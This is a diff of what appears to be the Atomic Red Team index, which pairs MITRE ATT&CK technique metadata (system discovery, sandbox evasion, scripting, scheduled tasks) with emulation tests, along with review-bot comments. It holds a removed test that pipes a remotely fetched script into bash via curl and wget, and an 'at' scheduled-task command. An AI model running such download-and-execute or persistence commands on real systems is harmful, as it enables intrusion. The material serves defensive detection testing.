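Review bot: The new `T1497.001` entry carries `atomic_tests: []`, so every consumer of this index that iterates a technique's tests must treat an empty sequence the same as an absent key, otherwise the sub-technique will surface as a technique with zero tests in generated output; worth confirming before merge. The description keeps the upstream wording `Specific checks may will vary` and the citation key `Microsoft Virutal Machine API`; since the `(Citation: ...)` markers in the T1082 description must match `source_name` exactly, neither should be hand-corrected in this file — the fix belongs in the ATT&CK source that is re-imported here. Note also that the sub-technique's `x_mitre_data_sources` are only process monitoring and command-line parameters, while the description itself names checks through the VMware I/O port and processor instructions that produce no command line at all, so a reviewer reading this entry should not expect those variants to be detectable from the listed sources. The `T1082` mapping continues past this hunk.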
@@ -37840,21 +38970,8 @@ discovery:
October 8, 2019.
url: https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get
source_name: Microsoft Virutal Machine API
- description: |-
- An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges.
-
- Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)
- name: System Information Discovery
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-26T18:17:42.298Z'
- created: '2017-05-31T21:31:04.307Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_platforms:
- Linux
- macOS
@@ -38029,21 +39146,21 @@ discovery:
phase_name: discovery
modified: '2020-03-15T00:55:33.136Z'
created: '2017-05-31T21:30:27.342Z'
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.2'
identifier: T1016
atomic_tests:
- name: System Network Configuration Discovery on Windows
@@ -38198,6 +39315,20 @@ discovery:
phase_name: discovery
modified: '2020-03-15T14:15:32.910Z'
created: '2017-05-31T21:30:45.139Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_version: '2.1'
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_platforms:
- Linux
- macOS
@@ -38205,20 +39336,6 @@ discovery:
- AWS
- GCP
- Azure
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_version: '2.1'
- x_mitre_contributors:
- - Praetorian
- x_mitre_is_subtechnique: false
identifier: T1049
atomic_tests:
- name: System Network Connections Discovery
@@ -38270,8 +39387,19 @@ discovery:
name: sh
T1033:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:30:35.733Z'
+ modified: '2020-03-15T01:03:47.866Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: System Owner/User Discovery
+ description: |-
+ Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Utilities and commands that acquire this information include whoami. In Mac and Linux, the currently logged in user can be identified with w and who.
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1033
@@ -38279,19 +39407,8 @@ discovery:
- external_id: CAPEC-577
source_name: capec
url: https://capec.mitre.org/data/definitions/577.html
- description: |-
- Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Utilities and commands that acquire this information include whoami. In Mac and Linux, the currently logged in user can be identified with w and who.
- name: System Owner/User Discovery
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-15T01:03:47.866Z'
- created: '2017-05-31T21:30:35.733Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_platforms:
- Linux
- macOS
@@ -38390,21 +39507,21 @@ discovery:
phase_name: discovery
modified: '2020-03-15T01:05:08.805Z'
created: '2017-05-31T21:30:21.315Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
x_mitre_permissions_required:
- User
- Administrator
- SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.1'
identifier: T1007
atomic_tests:
- name: System Service Discovery
@@ -38478,21 +39595,21 @@ discovery:
phase_name: discovery
modified: '2020-03-15T01:07:42.700Z'
created: '2017-05-31T21:31:37.450Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - API monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Command-line interface monitoring may be useful to detect
instances of net.exe or other command-line utilities being used to gather
system time or time zone. Methods of detecting API use for gathering this
information are likely less useful due to how often they may be used by legitimate
software.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - API monitoring
+ x_mitre_version: '1.1'
identifier: T1124
atomic_tests:
- name: System Time Discovery
@@ -38526,6 +39643,204 @@ discovery:
'
name: powershell
+ T1497.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497.003
+ url: https://attack.mitre.org/techniques/T1497/003
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Time Based Evasion
+ description: "Adversaries may employ various time-based methods to detect and
+ avoid virtualization and analysis environments. This may include timers or
+ other triggers to avoid a virtual machine environment (VME) or sandbox, specifically
+ those that are automated or only operate for a limited amount of time.\n\nAdversaries
+ may employ various time-based evasions, such as delaying malware functionality
+ upon initial execution using programmatic sleep commands or native system
+ scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)).
+ Delays may also be based on waiting for specific victim conditions to be met
+ (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104)
+ to avoid analysis and scrutiny. "
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.532Z'
+ created: '2020-03-06T21:11:11.225Z'
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: 'Time-based evasion will likely occur in the first steps
+ of an operation but may also occur throughout as an adversary learns the environment.
+ Data and events should not be viewed in isolation, but as part of a chain
+ of behavior that could lead to other activities, such as lateral movement,
+ based on the information obtained. Detecting actions related to virtualization
+ and sandbox identification may be difficult depending on the adversary''s
+ implementation and monitoring required. Monitoring for suspicious processes
+ being spawned that gather a variety of system information or perform other
+ forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ atomic_tests: []
+ T1497.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497.002
+ url: https://attack.mitre.org/techniques/T1497/002
+ - source_name: Sans Virtual Jan 2016
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ - source_name: Unit 42 Sofacy Nov 2018
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: User Activity Based Checks
+ description: "Adversaries may employ various user activity checks to detect
+ and avoid virtualization and analysis environments. This may include changing
+ behaviors based on the results of checks for the presence of artifacts indicative
+ of a virtual machine environment (VME) or sandbox. If the adversary detects
+ a VME, they may alter their malware to disengage from the victim or conceal
+ the core functions of the implant. They may also search for VME artifacts
+ before dropping secondary or additional payloads. Adversaries may use the
+ information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
+ during automated discovery to shape follow-on behaviors. \n\nAdversaries may
+ search for user activity on the host based on variables such as the speed/frequency
+ of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser
+ history, cache, bookmarks, or number of files in common directories such as
+ home or the desktop. Other methods may rely on specific user interaction with
+ the system before the malicious code is activated, such as waiting for a document
+ to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or
+ waiting for a user to double click on an embedded image to activate.(Citation:
+ FireEye FIN7 April 2017) "
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.491Z'
+ created: '2020-03-06T21:04:12.454Z'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Static File Analysis
+ - Signature-based detection
+ - Host forensic analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: 'User activity-based checks will likely occur in the first
+ steps of an operation but may also occur throughout as an adversary learns
+ the environment. Data and events should not be viewed in isolation, but as
+ part of a chain of behavior that could lead to other activities, such as lateral
+ movement, based on the information obtained. Detecting actions related to
+ virtualization and sandbox identification may be difficult depending on the
+ adversary''s implementation and monitoring required. Monitoring for suspicious
+ processes being spawned that gather a variety of system information or perform
+ other forms of Discovery, especially in a short period of time, may aid in
+ detection. '
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process use of network
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ atomic_tests: []
+ T1497:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497
+ url: https://attack.mitre.org/techniques/T1497
+ - source_name: Unit 42 Pirpi July 2015
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Virtualization/Sandbox Evasion
+ description: "Adversaries may employ various means to detect and avoid virtualization
+ and analysis environments. This may include changing behaviors based on the
+ results of checks for the presence of artifacts indicative of a virtual machine
+ environment (VME) or sandbox. If the adversary detects a VME, they may alter
+ their malware to disengage from the victim or conceal the core functions of
+ the implant. They may also search for VME artifacts before dropping secondary
+ or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox
+ Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery
+ to shape follow-on behaviors. \n\nAdversaries may use several methods to accomplish
+ [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
+ such as checking for security monitoring tools (e.g., Sysinternals, Wireshark,
+ etc.) or other system artifacts associated with analysis or virtualization.
+ Adversaries may also check for legitimate user activity to help determine
+ if it is in an analysis environment. Additional methods include use of sleep
+ timers or loops within malware code to avoid operating within a temporary
+ sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n"
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.272Z'
+ created: '2019-04-17T22:22:24.505Z'
+ x_mitre_version: '1.2'
+ x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
+ techniques will likely occur in the first steps of an operation but may also
+ occur throughout as an adversary learns the environment. Data and events should
+ not be viewed in isolation, but as part of a chain of behavior that could
+ lead to other activities, such as lateral movement, based on the information
+ obtained. Detecting actions related to virtualization and sandbox identification
+ may be difficult depending on the adversary's implementation and monitoring
+ required. Monitoring for suspicious processes being spawned that gather a
+ variety of system information or perform other forms of Discovery, especially
+ in a short period of time, may aid in detection.
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ x_mitre_is_subtechnique: false
+ atomic_tests: []
execution:
T1059.002:
technique:
@@ -38537,7 +39852,7 @@ execution:
url: https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html
description: Apple. (2016, January 25). Introduction to AppleScript Language
Guide. Retrieved March 28, 2020.
- - url: https://securingtomorrow.mcafee.com/mcafee-labs/macro-malware-targets-macs/
+ - url: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/
description: Yerko Grbic. (2017, February 14). Macro Malware Targets Macs.
Retrieved July 8, 2017.
source_name: Macro Malware Targets Macs
@@ -38556,19 +39871,19 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-28T16:44:34.580Z'
+ modified: '2020-04-14T13:28:17.696Z'
created: '2020-03-09T14:07:54.329Z'
- x_mitre_platforms:
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor for execution of AppleScript through osascript that
+ may be related to other suspicious behavior occurring on the system.
x_mitre_data_sources:
- Process monitoring
- Process command-line parameters
- x_mitre_detection: Monitor for execution of AppleScript through osascript that
- may be related to other suspicious behavior occurring on the system.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - macOS
identifier: T1059.002
atomic_tests:
- name: AppleScript
@@ -38616,11 +39931,9 @@ execution:
phase_name: privilege-escalation
modified: '2020-03-23T22:35:13.112Z'
created: '2019-12-03T12:59:36.749Z'
- x_mitre_platforms:
- - Linux
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
x_mitre_detection: "Monitor scheduled task creation using command-line invocation.
Legitimate scheduled tasks may be created during installation of new software
or through system administration functions. Look for changes to tasks that
@@ -38631,9 +39944,11 @@ execution:
could lead to other activities, such as network connections made for Command
and Control, learning details about the environment through Discovery, and
Lateral Movement."
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
atomic_tests: []
T1053.002:
technique:
@@ -38688,8 +40003,16 @@ execution:
phase_name: privilege-escalation
modified: '2020-03-24T13:43:40.776Z'
created: '2019-11-27T13:52:45.853Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
@@ -38705,16 +40028,8 @@ execution:
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1053.002
atomic_tests:
- name: At.exe Scheduled task
@@ -38732,105 +40047,17 @@ execution:
command: 'at 13:20 /interactive cmd
'
- T1059.004:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1059.004
- url: https://attack.mitre.org/techniques/T1059/004
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Bash
- description: "Adversaries may abuse Bash commands and scripts for execution.
- Bash, the primary macOS (through Mojave) and Linux shell, can control every
- aspect of a system, with certain commands requiring elevated privileges. \n\nBash
- scripts (.sh) provide the shell with a list of sequential commands to run,
- as well as normal scripting operations such as conditionals and loops. Common
- uses of Bash scripts include long or repetitive tasks, or the need to run
- the same set of commands on multiple systems."
- id: attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-03-28T17:06:19.681Z'
- created: '2020-03-09T14:15:05.330Z'
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: "Bash usage may be common on administrator, developer, or
- power user systems, depending on job function. If scripting is restricted
- for normal users, then any attempt to enable scripts running on a system would
- be considered suspicious. If scripts are not commonly used on a system, but
- enabled, scripts running out of cycle from patching or other administrator
- functions are suspicious. Scripts should be captured from the file system
- when possible to determine their actions and intent.\n\nScripts are likely
- to perform actions with various effects on a system that may generate events,
- depending on the types of monitoring used. Monitor processes and command-line
- arguments for script execution and subsequent behavior. Actions may be related
- to network and system information Discovery, Collection, or other scriptable
- post-compromise behaviors and could be used as indicators of detection leading
- back to the source script. "
- x_mitre_permissions_required:
- - User
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- identifier: T1059.004
- atomic_tests:
- - name: Create and Execute Bash Shell Script
- auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
- description: 'Creates and executes a simple bash script.
-
-'
- supported_platforms:
- - macos
- - linux
- input_arguments:
- script_path:
- description: Script path
- type: path
- default: "/tmp/art.sh"
- executor:
- command: |
- sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
- sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}"
- chmod +x #{script_path}
- sh #{script_path}
- cleanup_command: 'rm #{script_path}
-
-'
- name: sh
- - name: Command-Line Interface
- auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
- description: |
- Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
-
- Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
- supported_platforms:
- - macos
- - linux
- executor:
- command: |
- curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
- wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
- cleanup_command: 'rm /tmp/art-fish.txt
-
-'
- name: sh
T1059:
technique:
id: attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Command and Scripting Interpreter
description: |-
- Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, many Linux distributions include [Bash](https://attack.mitre.org/techniques/T1059/004) as a default shell while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- There are also additional third-party interpreters, such as [Python](https://attack.mitre.org/techniques/T1059/006), that may also be cross-platform.
+ There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
+
+ Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells.
external_references:
- source_name: mitre-attack
external_id: T1059
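Review bot: The whole `T1059.004` entry (the `Bash` technique together with its two atomic tests and their `auto_generated_guid` values) is removed in this hunk, yet the rewritten `T1059` description on the new side still links to `https://attack.mitre.org/techniques/T1059/004` as `Unix Shell`, so the index now points at a sub-technique it no longer contains. If this file is regenerated from upstream ATT&CK data plus the atomics directory, the expected outcome of the upstream rename would be a `T1059.004` block renamed to `Unix Shell` with the existing tests carried over, rather than the entry disappearing; worth confirming whether dropping the tests was intentional or a side effect of the regeneration. The hunk also removes the curl/wget-pipe-to-bash test without a replacement, which changes test coverage for Unix shell execution rather than just metadata, so a sentence in the commit description explaining the removal would help the next reader.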
@@ -38842,27 +40069,28 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-28T17:44:07.939Z'
+ modified: '2020-06-25T03:32:51.380Z'
created: '2017-05-31T21:30:49.546Z'
- x_mitre_version: '2.0'
- x_mitre_data_sources:
- - Windows Registry
- - Windows event logs
- - PowerShell logs
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: Command-line and scripting activities can be captured through
- proper logging of process execution with command-line arguments. This information
- can be useful in gaining additional insight to adversaries' actions through
- how they use native processes or custom tools.
+ x_mitre_is_subtechnique: false
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - User
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_permissions_required:
- - User
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
+
+ If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+
+ Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
+ x_mitre_data_sources:
+ - Windows event logs
+ - PowerShell logs
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '2.0'
atomic_tests: []
T1559.001:
technique:
@@ -38870,7 +40098,7 @@ execution:
description: |-
